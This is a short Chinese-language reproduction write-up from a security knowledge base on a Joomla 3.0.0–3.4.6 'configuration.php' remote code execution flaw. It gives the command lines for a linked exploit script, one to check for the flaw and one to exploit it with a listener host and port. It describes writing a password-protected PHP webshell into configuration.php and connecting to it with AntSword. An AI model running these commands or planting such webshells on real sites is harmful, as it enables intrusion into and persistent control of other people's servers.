menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Joomla 3.4.6 - 'configuration.php' Remote Code Execution chevron_right Joomla 3.4.6 - 'configuration.php' Remote Code Execution.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Joomla 3.4.6 - 'configuration.php' Remote Code Execution.md
    1.06 KB / 2021-07-15 19:54:50
        Joomla 3.4.6 configuration.php 远程代码执行
    ===========================================
    
    一、漏洞简介
    ------------
    
    Joomla 3.4.6 - \'configuration.php\' Remote Code Execution
    
    二、影响范围
    ------------
    
    Joomla 3.0.0 至 3.4.6
    
    三、复现过程
    ------------
    
    https://github.com/ianxtianxt/Joomla-3.4.6\-\--configuration.php-Remote-Code-Execution
    
    ### 脚本验证
    
    验证:
    
        python3 test.py -t http://127.0.0.1:8080/
    
    ![](./resource/Joomla3.4.6-'configuration.php'RemoteCodeExecution/media/rId25.png)
    
    显示"Vulnerable"证明存在漏洞
    
    利用:
    
        python3 test.py -t http://127.0.0.1:8080/ --exploit --lhost 192.168.31.126 --lport 2121
    
    ![](./resource/Joomla3.4.6-'configuration.php'RemoteCodeExecution/media/rId26.png)
    
    执行成功
    
    并在"configuration.php"写入**随机密码**的一句话木马![](./resource/Joomla3.4.6-'configuration.php'RemoteCodeExecution/media/rId27.png)上图的密码为:kyevgbxjmwivdvegohfzwuukuzswxqquthlrsollpxzgiifumi
    
    蚁剑链接测试
    
    ![](./resource/Joomla3.4.6-'configuration.php'RemoteCodeExecution/media/rId28.png)
    
    
    links
    file_download